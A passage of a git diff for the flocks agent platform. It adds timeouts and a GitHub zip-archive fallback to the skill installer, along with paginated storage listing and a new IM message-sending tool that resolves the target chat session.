+    "read_file_part_bytes",
+    "truncate_extracted_text",
 ]
diff --git a/flocks/skill/installer.py b/flocks/skill/installer.py
index 7f1a42e28..98583903f 100644
--- a/flocks/skill/installer.py
+++ b/flocks/skill/installer.py
@@ -19,12 +19,14 @@
 from __future__ import annotations
 
 import asyncio
+import io
 import os
 import platform
 import re
 import shutil
 import sys
 import tempfile
+import zipfile
 from dataclasses import dataclass, field
 from pathlib import Path
 from typing import Any, List, Optional
@@ -35,6 +37,10 @@
 
 log = Log.create(service="skill.installer")
 
+_NETWORK_TIMEOUT_SEC = 20
+_SKILLS_SH_CLI_TIMEOUT_SEC = 45
+_INSTALL_TIMEOUT_SEC = 90
+
 # ---------------------------------------------------------------------------
 # Result Types
 # ---------------------------------------------------------------------------
@@ -161,6 +167,42 @@ def _resolve_source(source: str) -> dict:
 class SkillInstaller:
     """Install skills from external sources and manage skill dependencies."""
 
+    @staticmethod
+    async def _run_subprocess(
+        cmd: list[str],
+        *,
+        timeout_sec: float,
+        cwd: Optional[str] = None,
+        env: Optional[dict[str, str]] = None,
+    ) -> tuple[int, str, str]:
+        """Run ``cmd``; return ``(returncode, stdout, stderr)`` or raise ``TimeoutError`` after ``timeout_sec``."""
+        proc = await asyncio.create_subprocess_exec(
+            *cmd, cwd=cwd, env=env,
+            stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE,
+        )
+        try:
+            stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout_sec)
+        except (asyncio.TimeoutError, asyncio.CancelledError) as exc:
+            # Kill on timeout and also on cancellation (e.g. an outer wait_for expiring)
+            # so the child process is never left running after we stop awaiting it.
+            try:
+                proc.kill()
+            except ProcessLookupError:
+                pass  # process already exited
+            if isinstance(exc, asyncio.CancelledError):
+                raise  # propagate cancellation unchanged
+            try:
+                # Bounded wait so the killed process is reaped and its pipes are drained.
+                await asyncio.wait_for(proc.communicate(), timeout=5)
+            except Exception:
+                pass  # best-effort cleanup; the TimeoutError below is what callers see
+            raise TimeoutError(f"Command timed out after {timeout_sec:g}s: {' '.join(cmd)}")
+        return (
+            proc.returncode if proc.returncode is not None else 0,
+            stdout_b.decode(errors="replace"),
+            stderr_b.decode(errors="replace"),
+        )
+
     # ------------------------------------------------------------------
     # Install skill itself
     # ------------------------------------------------------------------
@@ -191,24 +233,32 @@ async def install_from_source(
 
         log.info("skill.install.start", {"source": source, "kind": kind, "scope": scope, "yes": yes})
 
-        if kind == "skills_sh":
-            return await cls._install_from_skills_sh(value, scope, yes=yes)
-        elif kind == "safeskill":
-            return await cls._install_from_safeskill(value, scope)
-        elif kind == "clawhub":
-            return await cls._install_from_clawhub(value, scope)
-        elif kind == "github":
-            return await cls._install_from_github(value, scope)
-        elif kind == "url":
-            return await cls._install_from_url(value, scope)
-        elif kind == "local":
-            return await cls._install_from_local(value, scope)
-        else:
+        async def _install() -> SkillInstallResult:
+            if kind == "skills_sh":
+                return await cls._install_from_skills_sh(value, scope, yes=yes)
+            elif kind == "safeskill":
+                return await cls._install_from_safeskill(value, scope)
+            elif kind == "clawhub":
+                return await cls._install_from_clawhub(value, scope)
+            elif kind == "github":
+                return await cls._install_from_github(value, scope)
+            elif kind == "url":
+                return await cls._install_from_url(value, scope)
+            elif kind == "local":
+                return await cls._install_from_local(value, scope)
             return SkillInstallResult(
                 success=False,
                 error=f"Unsupported source kind: {kind}",
             )
 
+        try:
+            return await asyncio.wait_for(_install(), timeout=_INSTALL_TIMEOUT_SEC)
+        except asyncio.TimeoutError:
+            return SkillInstallResult(
+                success=False,
+                error=f"Skill install timed out after {_INSTALL_TIMEOUT_SEC}s: {source}",
+            )
+
     @classmethod
     async def _install_from_skills_sh(
         cls,
@@ -267,22 +317,25 @@ async def _install_from_skills_sh_cli(
             cmd = [npx, "-y", "skills", "add", identifier]
             if yes:
                 cmd.append("-y")
-            proc = await asyncio.create_subprocess_exec(
-                *cmd,
-                cwd=str(staging),
-                env=env,
-                stdout=asyncio.subprocess.PIPE,
-                stderr=asyncio.subprocess.PIPE,
-            )
-            stdout_b, stderr_b = await proc.communicate()
-            output = (
-                stdout_b.decode(errors="replace")
-                + stderr_b.decode(errors="replace")
-            ).strip()
-            if proc.returncode != 0:
+            try:
+                returncode, stdout, stderr = await cls._run_subprocess(
+                    cmd,
+                    cwd=str(staging),
+                    env=env,
+                    timeout_sec=_SKILLS_SH_CLI_TIMEOUT_SEC,
+                )
+            except TimeoutError as exc:
+                return SkillInstallResult(success=False, error=str(exc))
+            except Exception as exc:
+                return SkillInstallResult(
+                    success=False,
+                    error=f"Failed to run skills.sh CLI: {exc}",
+                )
+            output = (stdout + stderr).strip()
+            if returncode != 0:
                 return SkillInstallResult(
                     success=False,
-                    error=output or f"skills.sh CLI failed with exit {proc.returncode}",
+                    error=output or f"skills.sh CLI failed with exit {returncode}",
                 )
 
             imported = cls._import_staged_skill_dirs(staging, scope)
@@ -337,21 +390,24 @@ async def _install_from_safeskill(cls, source: str, scope: str) -> SkillInstallR
                 "-a",
                 "universal",
             ]
-            proc = await asyncio.create_subprocess_exec(
-                *cmd,
-                cwd=str(staging),
-                stdout=asyncio.subprocess.PIPE,
-                stderr=asyncio.subprocess.PIPE,
-            )
-            stdout_b, stderr_b = await proc.communicate()
-            output = (
-                stdout_b.decode(errors="replace")
-                + stderr_b.decode(errors="replace")
-            ).strip()
-            if proc.returncode != 0:
+            try:
+                returncode, stdout, stderr = await cls._run_subprocess(
+                    cmd,
+                    cwd=str(staging),
+                    timeout_sec=_SKILLS_SH_CLI_TIMEOUT_SEC,
+                )
+            except TimeoutError as exc:
+                return SkillInstallResult(success=False, error=str(exc))
+            except Exception as exc:
+                return SkillInstallResult(
+                    success=False,
+                    error=f"Failed to run SafeSkill CLI: {exc}",
+                )
+            output = (stdout + stderr).strip()
+            if returncode != 0:
                 return SkillInstallResult(
                     success=False,
-                    error=output or f"SafeSkill CLI failed with exit {proc.returncode}",
+                    error=output or f"SafeSkill CLI failed with exit {returncode}",
                 )
 
             imported = cls._import_staged_skill_dirs(staging, scope)
@@ -404,7 +460,7 @@ async def _resolve_skills_sh_github_identifier(cls, identifier: str) -> Optional
             return None
 
         try:
-            async with httpx.AsyncClient(timeout=20, follow_redirects=True) as client:
+            async with httpx.AsyncClient(timeout=_NETWORK_TIMEOUT_SEC, follow_redirects=True) as client:
                 resp = await client.get(f"https://skills.sh/{normalized}")
                 if resp.status_code != 200:
                     return None
@@ -492,7 +548,7 @@ async def _install_from_clawhub(cls, name: str, scope: str) -> SkillInstallResul
 
         zip_url = f"https://wry-manatee-359.convex.site/api/v1/download?slug={name}"
         try:
-            async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
+            async with httpx.AsyncClient(timeout=_NETWORK_TIMEOUT_SEC, follow_redirects=True) as client:
                 resp = await client.get(zip_url)
                 if resp.status_code == 404:
                     return SkillInstallResult(
@@ -633,34 +689,56 @@ async def _install_from_github(cls, repo_path: str, scope: str) -> SkillInstallR
             candidate_paths = [""]
 
         errors: List[str] = []
-        async with httpx.AsyncClient(
-            timeout=30,
-            follow_redirects=True,
-            headers={"Accept": "application/vnd.github+json"},
-        ) as client:
-            for branch in ("main", "master"):
-                for dir_path in candidate_paths:
-                    result = await cls._download_github_dir(
-                        client, owner, repo, branch, dir_path, scope
-                    )
-                    if result.success:
-                        return result
-                    if result.error:
-                        errors.append(result.error)
-
-            # Unauthenticated GitHub Contents API can return 403 rate-limit
-            # errors while raw.githubusercontent.com still works. In that case
-            # install the SKILL.md directly instead of reporting a misleading
-            # "directory not found" error.
-            for branch in ("main", "master"):
-                for dir_path in candidate_paths:
-                    result = await cls._download_github_skill_md_raw(
-                        client, owner, repo, branch, dir_path, scope
+        try:
+            async with httpx.AsyncClient(
+                timeout=_NETWORK_TIMEOUT_SEC,
+                follow_redirects=True,
+                headers={"Accept": "application/vnd.github+json"},
+            ) as client:
+                for branch in ("main", "master"):
+                    for dir_path in candidate_paths:
+                        result = await cls._download_github_dir(
+                            client, owner, repo, branch, dir_path, scope
+                        )
+                        if result.success:
+                            return result
+                        if result.error:
+                            errors.append(result.error)
+
+                # Unauthenticated GitHub Contents API can return 403 rate-limit
+                # errors while raw.githubusercontent.com still works. In that case
+                # install the SKILL.md directly instead of reporting a misleading
+                # "directory not found" error.
+                for branch in ("main", "master"):
+                    for dir_path in candidate_paths:
+                        result = await cls._download_github_skill_md_raw(
+                            client, owner, repo, branch, dir_path, scope
+                        )
+                        if result.success:
+                            return result
+                        if result.error:
+                            errors.append(result.error)
+
+                skill_hint = Path(subpath).name if subpath else None
+                for branch in ("main", "master"):
+                    result = await cls._download_github_archive_skill(
+                        client,
+                        owner,
+                        repo,
+                        branch,
+                        candidate_paths,
+                        skill_hint,
+                        scope,
                     )
                     if result.success:
                         return result
                     if result.error:
                         errors.append(result.error)
+        except Exception as exc:
+            return SkillInstallResult(
+                success=False,
+                error=f"GitHub download failed for {owner}/{repo}: {exc}",
+            )
 
         if errors and any("GitHub API 403" in error for error in errors):
             return SkillInstallResult(
@@ -677,6 +755,114 @@ async def _install_from_github(cls, repo_path: str, scope: str) -> SkillInstallR
             error=f"Could not find a skill directory in GitHub repo: {owner}/{repo}",
         )
 
+    @classmethod
+    async def _download_github_archive_skill(
+        cls,
+        client: Any,
+        owner: str,
+        repo: str,
+        branch: str,
+        candidate_paths: list[str],
+        skill_hint: Optional[str],
+        scope: str,
+    ) -> SkillInstallResult:
+        """Download a GitHub zip archive and import the matching skill directory."""
+        archive_url = f"https://codeload.github.com/{owner}/{repo}/zip/refs/heads/{branch}"
+        resp = await client.get(archive_url)
+        if resp.status_code != 200:
+            return SkillInstallResult(
+                success=False,
+                error=f"GitHub archive HTTP {resp.status_code} for {archive_url}",
+            )
+
+        try:
+            with zipfile.ZipFile(io.BytesIO(resp.content)) as zf:
+                return cls._import_skill_from_github_zip(
+                    zf,
+                    owner,
+                    repo,
+                    branch,
+                    candidate_paths,
+                    skill_hint,
+                    scope,
+                )
+        except zipfile.BadZipFile:
+            return SkillInstallResult(
+                success=False,
+                error=f"GitHub archive for {owner}/{repo}@{branch} is not a valid ZIP file",
+            )
+
+    @classmethod
+    def _import_skill_from_github_zip(
+        cls,
+        zf: zipfile.ZipFile,
+        owner: str,
+        repo: str,
+        branch: str,
+        candidate_paths: list[str],
+        skill_hint: Optional[str],
+        scope: str,
+    ) -> SkillInstallResult:
+        normalized_candidates = {path.strip("/") for path in candidate_paths}
+        skill_hint = (skill_hint or "").strip()
+        skill_mds = [name for name in zf.namelist() if name.endswith("/SKILL.md")]
+
+        for skill_md in skill_mds:
+            parts = Path(skill_md).parts
+            if len(parts) < 2:
+                continue
+            skill_dir = "/".join(parts[:-1])
+            relative_dir = "/".join(parts[1:-1])
+            dir_name = parts[-2]
+            try:
+                content = zf.read(skill_md).decode("utf-8")
+            except Exception:
+                continue
+            data = Skill._parse_frontmatter(content)
+            name = (data.get("name") or dir_name).strip()
+            if not name or not Skill._is_valid_name(name):
+                continue
+
+            if relative_dir not in normalized_candidates:
+                if not skill_hint or (name != skill_hint and dir_name != skill_hint):
+                    continue
+
+            skill_root = _resolve_install_root(scope) / name
+            skill_root.mkdir(parents=True, exist_ok=True)
+            skill_root_resolved = skill_root.resolve()
+            prefix = f"{skill_dir}/"
+            file_count = 0
+            for member in zf.namelist():
+                if not member.startswith(prefix) or member.endswith("/"):
+                    continue
+                rel_path = member[len(prefix):]
+                if not rel_path:
+                    continue
+                dest = (skill_root / rel_path).resolve()
+                try:
+                    dest.relative_to(skill_root_resolved)
+                except ValueError:
+                    continue
+                dest.parent.mkdir(parents=True, exist_ok=True)
+                dest.write_bytes(zf.read(member))
+                file_count += 1
+
+            Skill.clear_cache()
+            return SkillInstallResult(
+                success=True,
+                skill_name=name,
+                location=str(skill_root / "SKILL.md"),
+                message=(
+                    f"Skill '{name}' installed to {skill_root} "
+                    f"from GitHub archive {owner}/{repo}@{branch} ({file_count} files)"
+                ),
+            )
+
+        return SkillInstallResult(
+            success=False,
+            error=f"No matching SKILL.md found in GitHub archive for {owner}/{repo}@{branch}",
+        )
+
     @classmethod
     async def _download_github_skill_md_raw(
         cls,
@@ -852,7 +1038,7 @@ async def _install_from_url(
             )
 
         try:
-            async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
+            async with httpx.AsyncClient(timeout=_NETWORK_TIMEOUT_SEC, follow_redirects=True) as client:
                 resp = await client.get(url)
                 if resp.status_code != 200:
                     return SkillInstallResult(
diff --git a/flocks/skill/skill.py b/flocks/skill/skill.py
index 2aabe5e3d..2bdb8f3cc 100644
--- a/flocks/skill/skill.py
+++ b/flocks/skill/skill.py
@@ -154,6 +154,7 @@ class SkillMetadata(BaseModel):
     os: Optional[List[str]] = None
     homepage: Optional[str] = None
     emoji: Optional[str] = None
+    ui_hidden: Optional[bool] = None
 
 
 class SkillInfo(BaseModel):
@@ -163,6 +164,7 @@ class SkillInfo(BaseModel):
     location: str = Field(..., description="Path to SKILL.md file")
     source: Optional[str] = Field(default=None, description="Discovery source")
     category: Optional[str] = Field(default=None, description="Skill category (e.g. 'system')")
+    ui_hidden: bool = Field(default=False, description="Whether the skill should be omitted from skill management UI")
     native: bool = Field(default=False, description=(
         "True only for project-installed skills (<cwd>/.flocks/plugins/skills/). "
         "All other locations (.flocks/skills/, ~/.flocks/plugins/skills/, .claude/) "
@@ -225,6 +227,7 @@ def _parse_skill_md(cls, filepath: str, source: Optional[str] = None) -> Optiona
             name = (data.get("name") or "").strip()
             description = (data.get("description") or "").strip()
             category = (data.get("category") or "").strip().lower() or None
+            ui_hidden = cls._as_bool(data.get("ui_hidden"))
 
             if not cls._is_valid_name(name) or not cls._is_valid_description(description):
                 return None
@@ -242,6 +245,7 @@ def _parse_skill_md(cls, filepath: str, source: Optional[str] = None) -> Optiona
                         skill_metadata = SkillMetadata.model_validate(raw_flocks)
                         install_specs = skill_metadata.install or None
                         requires = skill_metadata.requires or None
+                        ui_hidden = ui_hidden or bool(skill_metadata.ui_hidden)
                     except Exception as exc:
                         log.warn("skill.metadata.parse.error", {
                             "filepath": filepath,
@@ -258,6 +262,7 @@ def _parse_skill_md(cls, filepath: str, source: Optional[str] = None) -> Optiona
                 location=filepath,
                 source=source,
                 category=category,
+                ui_hidden=ui_hidden,
                 native=is_native,
                 metadata=skill_metadata,
                 install_specs=install_specs,
@@ -312,6 +317,14 @@ def _is_valid_name(name: str) -> bool:
     def _is_valid_description(description: str) -> bool:
         return 1 <= len(description) <= 1024
 
+    @staticmethod
+    def _as_bool(value: Any) -> bool:
+        if isinstance(value, bool):
+            return value
+        if isinstance(value, str):
+            return value.strip().lower() in {"1", "true", "yes", "on"}
+        return bool(value)
+
     @classmethod
     def _scan_directory(
         cls,
diff --git a/flocks/storage/storage.py b/flocks/storage/storage.py
index a7f042fdc..5614ef39a 100644
--- a/flocks/storage/storage.py
+++ b/flocks/storage/storage.py
@@ -978,6 +978,53 @@ async def list_entries(
             entries.append((key, value))
         return entries
 
+    @classmethod
+    async def list_entries_page(
+        cls,
+        prefix: str,
+        *,
+        offset: int = 0,
+        limit: int = 100,
+        model: Optional[Type[T]] = None,
+    ) -> tuple[List[Tuple[str, T | Any]], int]:
+        """List one page of entries for a prefix, plus total matching rows."""
+        await cls._ensure_init()
+
+        safe_offset = max(int(offset), 0)
+        safe_limit = max(int(limit), 0)
+        params = (f"{prefix}%",)
+
+        async with cls.connect(cls._db_path) as db:
+            async with db.execute(
+                "SELECT COUNT(*) FROM storage WHERE key LIKE ?",
+                params,
+            ) as cursor:
+                row = await cursor.fetchone()
+                total = int(row[0]) if row else 0
+
+            if safe_limit == 0:
+                return [], total
+
+            async with db.execute(
+                """
+                SELECT key, value FROM storage
+                WHERE key LIKE ?
+                ORDER BY key
+                LIMIT ? OFFSET ?
+                """,
+                (f"{prefix}%", safe_limit, safe_offset),
+            ) as cursor:
+                rows = await cursor.fetchall()
+
+        entries: List[Tuple[str, T | Any]] = []
+        for key, value_str in rows:
+            if model is not None and hasattr(model, "model_validate_json"):
+                value = model.model_validate_json(value_str)
+            else:
+                value = json.loads(value_str)
+            entries.append((key, value))
+        return entries, total
+
     @classmethod
     async def list_raw(
         cls,
@@ -1176,4 +1223,4 @@ async def list(cls, prefix: List[str] | str | None = None) -> List[List[str]]:
         keys = await cls.list_keys(prefix_str)
         
         # Convert string keys back to list format
-        return [key.split("/") for key in keys]
\ No newline at end of file
+        return [key.split("/") for key in keys]
diff --git a/flocks/tool/agent/task.py b/flocks/tool/agent/task.py
index b934de335..0ef7ad922 100644
--- a/flocks/tool/agent/task.py
+++ b/flocks/tool/agent/task.py
@@ -34,6 +34,7 @@
     name="task",
     description=DESCRIPTION,
     category=ToolCategory.SYSTEM,
+    native=False,
     parameters=[
         ToolParameter(
             name="description",
diff --git a/flocks/tool/catalog.py b/flocks/tool/catalog.py
index c9b0b9af1..5ee1ec6af 100644
--- a/flocks/tool/catalog.py
+++ b/flocks/tool/catalog.py
@@ -62,6 +62,7 @@ class ToolCatalogMetadata(BaseModel):
     "ssh_host_cmd": ["security", "remote-execution"],
     "ssh_run_script": ["security", "remote-execution"],
     "channel_message": ["messaging", "channel"],
+    "im_send_message": ["messaging", "channel", "im"],
     "flocks_mcp": ["mcp", "management"],
     "wecom_mcp": ["enterprise", "wecom"],
     "get_time": ["system", "utility"],
diff --git a/flocks/tool/channel/channel_message.py b/flocks/tool/channel/channel_message.py
index 30b2ec790..bbe7ba19f 100644
--- a/flocks/tool/channel/channel_message.py
+++ b/flocks/tool/channel/channel_message.py
@@ -22,6 +22,7 @@
 
 _CHANNEL_ALIASES: dict[str, list[str]] = {
     "wecom": ["wecom", "企微", "企业微信", "wechat_work", "wxwork"],
+    "weixin": ["weixin", "微信", "wechat", "wx"],
     "feishu": ["feishu", "飞书", "lark"],
     "dingtalk": ["dingtalk", "钉钉", "dingding", "dingtalk-connector"],
 }
@@ -61,6 +62,8 @@ async def _http_session_send(
     text: str,
     channel_type: str | None = None,
     media_url: str | None = None,
+    account_id: str | None = None,
+    chat_id: str | None = None,
 ) -> ToolResult | None:
     """Send a message via the running flocks server's /api/channel/session-send endpoint,
     reusing the already-established WebSocket connection.
@@ -76,6 +79,10 @@ async def _http_session_send(
             payload["channel_type"] = channel_type
         if media_url:
             payload["media_url"] = media_url
+        if account_id:
+            payload["account_id"] = account_id
+        if chat_id:
+            payload["chat_id"] = chat_id
 
         headers: dict[str, str] = {}
         api_token = _get_api_token()
@@ -122,7 +129,8 @@ async def _http_session_send(
 @ToolRegistry.register_function(
     name="channel_message",
     description=(
-        "Send a message to the IM channel (WeCom / Feishu / DingTalk) bound to a session. "
+        "Send a message to the IM channel bound to a session. "
+        "Channel types: WeCom/企业微信=wecom, Weixin/微信=weixin, Feishu=feishu, DingTalk=dingtalk. "
         "Resolves the target channel and chat automatically from session_id. "
         "Use channel_type to target a specific channel when the session has multiple bindings."
     ),
@@ -144,9 +152,9 @@ async def _http_session_send(
             name="channel_type",
             type=ParameterType.STRING,
             required=False,
-            enum=["wecom", "feishu", "dingtalk", "企微", "飞书", "钉钉"],
+            enum=["wecom", "weixin", "feishu", "dingtalk", "企微", "企业微信", "微信", "飞书", "钉钉"],
             description=(
-                "Target channel: wecom, feishu, or dingtalk. "
+                "Target channel: wecom=企业微信, weixin=微信, feishu=飞书, or dingtalk=钉钉. "
                 "Chinese aliases are accepted. "
                 "If omitted and the session has only one binding, that channel is used automatically. "
                 "If omitted and the session has multiple bindings, the message is sent to all of them."
@@ -158,12 +166,26 @@ async def _http_session_send(
             required=False,
             description="Media URL or local file path (optional).",
         ),
+        ToolParameter(
+            name="account_id",
+            type=ParameterType.STRING,
+            required=False,
+            description="Optional exact binding filter. Usually supplied by im_send_message after target resolution.",
+        ),
+        ToolParameter(
+            name="chat_id",
+            type=ParameterType.STRING,
+            required=False,
+            description="Optional exact binding filter. Usually supplied by im_send_message after target resolution.",
+        ),
     ],
 )
 async def channel_message(ctx: ToolContext, **kwargs) -> ToolResult:
     session_id: str = kwargs["session_id"]
     message: str = kwargs["message"]
     media: str | None = kwargs.get("media")
+    account_id: str | None = kwargs.get("account_id")
+    chat_id: str | None = kwargs.get("chat_id")
     raw_channel_type: str | None = kwargs.get("channel_type")
     channel_type: str | None = _normalize_channel_type(raw_channel_type)
 
@@ -175,7 +197,15 @@ async def channel_message(ctx: ToolContext, **kwargs) -> ToolResult:
     except Exception:
         port = 8000
 
-    result = await _http_session_send(port, session_id, message, channel_type, media)
+    result = await _http_session_send(
+        port,
+        session_id,
+        message,
+        channel_type,
+        media,
+        account_id,
+        chat_id,
+    )
     if result is not None:
         return result
 
@@ -212,6 +242,19 @@ async def channel_message(ctx: ToolContext, **kwargs) -> ToolResult:
     else:
         targets = matched
 
+    if account_id:
+        targets = [b for b in targets if b.account_id == account_id]
+    if chat_id:
+        targets = [b for b in targets if b.chat_id == chat_id]
+    if (account_id or chat_id) and not targets:
+        return ToolResult(
+            success=False,
+            error=(
+                f"Session '{session_id}' has no binding matching "
+                f"account_id='{account_id}' chat_id='{chat_id}'."
+            ),
+        )
+
     all_results = []
     errors = []
 
diff --git a/flocks/tool/channel/im_send_message.py b/flocks/tool/channel/im_send_message.py
new file mode 100644
index 000000000..68fbc1078
--- /dev/null
+++ b/flocks/tool/channel/im_send_message.py
@@ -0,0 +1,285 @@
+"""High-level IM sending helper built on top of channel_message."""
+
+from __future__ import annotations
+
+from dataclasses import dataclass
+from typing import Any
+
+from flocks.tool.registry import (
+    ParameterType,
+    ToolCategory,
+    ToolContext,
+    ToolParameter,
+    ToolRegistry,
+    ToolResult,
+)
+
+
+_CHANNEL_ALIASES: dict[str, list[str]] = {
+    "wecom": ["wecom", "企微", "企业微信", "wechat_work", "wxwork"],
+    "weixin": ["weixin", "微信", "wechat", "wx"],
+    "feishu": ["feishu", "飞书", "lark"],
+    "dingtalk": ["dingtalk", "钉钉", "dingding", "dingtalk-connector"],
+}
+
+
+@dataclass(frozen=True)
+class _Candidate:
+    session_id: str
+    channel_id: str
+    account_id: str
+    chat_type: str
+    chat_id: str
+    title: str
+    last_message_at: float
+
+    @property
+    def label(self) -> str:
+        return f"{self.title} [{self.channel_id}] ({self.session_id})"
+
+    @property
+    def description(self) -> str:
+        return f"session_id={self.session_id} chat_type={self.chat_type} chat_id={self.chat_id}"
+
+
+def _normalize_channel_type(channel_type: str | None) -> str | None:
+    if not channel_type:
+        return None
+    lower = channel_type.strip().lower()
+    for canonical, aliases in _CHANNEL_ALIASES.items():
+        if lower in [alias.lower() for alias in aliases]:
+            return canonical
+    return lower
+
+
+def _matches_target(candidate: _Candidate, target: str | None) -> bool:
+    if not target:
+        return True
+    needle = target.strip().lower()
+    if not needle:
+        return True
+    return (
+        needle in candidate.session_id.lower()
+        or needle in candidate.channel_id.lower()
+        or needle in candidate.title.lower()
+        or needle in candidate.chat_id.lower()
+    )
+
+
+async def _list_candidates(channel_type: str | None = None, target: str | None = None) -> list[_Candidate]:
+    from flocks.channel.inbound.session_binding import SessionBindingService
+    from flocks.session.session import Session
+
+    svc = SessionBindingService()
+    bindings = await svc.list_bindings(channel_id=channel_type)
+    candidates: list[_Candidate] = []
+
+    for binding in bindings:
+        session = await Session.get_by_id(binding.session_id)
+        if not session or session.status != "active" or session.category != "user":
+            continue
+        candidate = _Candidate(
+            session_id=binding.session_id,
+            channel_id=binding.channel_id,
+            account_id=binding.account_id,
+            chat_type=binding.chat_type.value if binding.chat_type else "unknown",
+            chat_id=binding.chat_id,
+            title=session.title,
+            last_message_at=binding.last_message_at,
+        )
+        if _matches_target(candidate, target):
+            candidates.append(candidate)
+
+    return sorted(candidates, key=lambda c: c.last_message_at, reverse=True)
+
+
+async def _current_session_candidates(ctx: ToolContext, channel_type: str | None) -> list[_Candidate]:
+    if not ctx.session_id:
+        return []
+    candidates = await _list_candidates(channel_type=channel_type, target=ctx.session_id)
+    return [candidate for candidate in candidates if candidate.session_id == ctx.session_id]
+
+
+async def _ask_user_to_choose(ctx: ToolContext, candidates: list[_Candidate]) -> ToolResult:
+    from flocks.tool.system.question import question_tool
+
+    options = [
+        {"label": candidate.label, "description": candidate.description}
+        for candidate in candidates
+    ]
+    options.append({
+        "label": "I don't know",
+        "description": "Stop and ask me to provide a session ID.",
+    })
+
+    return await question_tool(
+        ctx,
+        questions=[
+            {
+                "question": "Which IM session should receive this message?",
+                "type": "choice",
+                "options": options,
+            }
+        ],
+    )
+
+
+def _selected_candidate(question_result: ToolResult, candidates: list[_Candidate]) -> _Candidate | None:
+    answers: Any = (question_result.metadata or {}).get("answers")
+    if not answers or not answers[0]:
+        return None
+
+    selected_label = str(answers[0][0])
+    for candidate in candidates:
+        if candidate.label == selected_label:
+            return candidate
+    return None
+
+
+def _resolution_output(candidate: _Candidate) -> str:
+    return (
+        f"Resolved IM target: session_id={candidate.session_id} "
+        f"channel_type={candidate.channel_id} chat_type={candidate.chat_type}"
+    )
+
+
+async def _resolve_target(
+    ctx: ToolContext,
+    session_id: str | None,
+    channel_type: str | None,
+    target: str | None,
+) -> ToolResult:
+    if session_id:
+        candidates = await _list_candidates(channel_type=channel_type, target=session_id)
+        exact = [candidate for candidate in candidates if candidate.session_id == session_id]
+        if exact:
+            return ToolResult(success=True, output=_resolution_output(exact[0]), metadata={"target": exact[0].__dict__})
+        return ToolResult(
+            success=False,
+            error=f"No active IM binding found for session_id='{session_id}'.",
+        )
+
+    current_candidates = await _current_session_candidates(ctx, channel_type)
+    if len(current_candidates) == 1 and not target:
+        candidate = current_candidates[0]
+        return ToolResult(success=True, output=_resolution_output(candidate), metadata={"target": candidate.__dict__})
+
+    candidates = await _list_candidates(channel_type=channel_type, target=target)
+    if not candidates:
+        filter_text = f" matching '{target}'" if target else ""
+        channel_text = f" for channel_type='{channel_type}'" if channel_type else ""
+        return ToolResult(
+            success=False,
+            error=(
+                f"No active IM sessions found{channel_text}{filter_text}. "
+                "Ask the user to send a message to the Flocks bot from the target IM chat first, "
+                "or provide an exact session_id."
+            ),
+        )
+
+    if len(candidates) == 1:
+        candidate = candidates[0]
+        return ToolResult(success=True, output=_resolution_output(candidate), metadata={"target": candidate.__dict__})
+
+    question_result = await _ask_user_to_choose(ctx, candidates)
+    if not question_result.success:
+        return question_result
+    if (question_result.metadata or {}).get("deferred"):
+        return question_result
+
+    selected = _selected_candidate(question_result, candidates)
+    if selected is None:
+        return ToolResult(
+            success=False,
+            error="No IM session selected. Ask the user for the exact session_id before sending.",
+        )
+
+    return ToolResult(success=True, output=_resolution_output(selected), metadata={"target": selected.__dict__})
+
+
+@ToolRegistry.register_function(
+    name="im_send_message",
+    description=(
+        "Resolve an IM target session and optionally send a message. "
+        "Use this for WeCom/企业微信, Weixin/微信, Feishu, DingTalk, or custom channel sessions when the user asks to send an IM message. "
+        "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
+        "If session_id is omitted, it uses the current IM session when available, otherwise asks the user to pick one."
+    ),
+    category=ToolCategory.SYSTEM,
+    parameters=[
+        ToolParameter(
+            name="message",
+            type=ParameterType.STRING,
+            required=False,
+            description="Message content to send. Required unless resolve_only=true.",
+        ),
+        ToolParameter(
+            name="session_id",
+            type=ParameterType.STRING,
+            required=False,
+            description="Exact Flocks session ID for the target IM chat, if already known.",
+        ),
+        ToolParameter(
+            name="channel_type",
+            type=ParameterType.STRING,
+            required=False,
+            description=(
+                "Optional channel filter, such as wecom=企业微信, weixin=微信, "
+                "feishu, dingtalk, telegram, or a custom channel id."
+            ),
+        ),
+        ToolParameter(
+            name="target",
+            type=ParameterType.STRING,
+            required=False,
+            description="Optional target hint: platform name, session title, session ID fragment, or chat ID fragment.",
+        ),
+        ToolParameter(
+            name="media",
+            type=ParameterType.STRING,
+            required=False,
+            description="Media URL or local file path (optional).",
+        ),
+        ToolParameter(
+            name="resolve_only",
+            type=ParameterType.BOOLEAN,
+            required=False,
+            default=False,
+            description="Resolve and return session_id/channel_type without sending. Use before schedule_task_create.",
+        ),
+    ],
+)
+async def im_send_message(ctx: ToolContext, **kwargs) -> ToolResult:
+    message: str | None = kwargs.get("message")
+    session_id: str | None = kwargs.get("session_id")
+    target: str | None = kwargs.get("target")
+    media: str | None = kwargs.get("media")
+    resolve_only: bool = bool(kwargs.get("resolve_only", False))
+    channel_type = _normalize_channel_type(kwargs.get("channel_type"))
+
+    if not resolve_only and not message:
+        return ToolResult(success=False, error="message is required unless resolve_only=true.")
+
+    resolved = await _resolve_target(ctx, session_id, channel_type, target)
+    if not resolved.success or resolve_only or (resolved.metadata or {}).get("deferred"):
+        return resolved
+
+    resolved_target = (resolved.metadata or {}).get("target") or {}
+    resolved_session_id = resolved_target.get("session_id")
+    resolved_channel_type = resolved_target.get("channel_id")
+    resolved_account_id = resolved_target.get("account_id")
+    resolved_chat_id = resolved_target.get("chat_id")
+    if not resolved_session_id:
+        return ToolResult(success=False, error="Failed to resolve an IM session_id.")
+
+    from flocks.tool.channel.channel_message import channel_message
+
+    return await channel_message(
+        ctx,
+        session_id=resolved_session_id,
+        message=message,
+        channel_type=resolved_channel_type,
+        account_id=resolved_account_id,
+        chat_id=resolved_chat_id,
+        media=media,
+    )
diff --git a/flocks/tool/credential_context.py b/flocks/tool/credential_context.py
index 9cac8a8f1..d4b0dfe1e 100644
--- a/flocks/tool/credential_context.py
+++ b/flocks/tool/credential_context.py
@@ -200,11 +200,13 @@ async def _build_overrides(device_id: str) -> _DeviceOverrides:
     config_ovr: Dict[str, Any] = {}
 
     if credential_fields:
+        mapped_field_keys: set[str] = set()
         for field in credential_fields:
             fkey = field.get("key", "")
             value = resolved_fields.get(fkey)
             if value is None:
                 continue
+            mapped_field_keys.add(fkey)
             storage = field.get("storage", "secret")
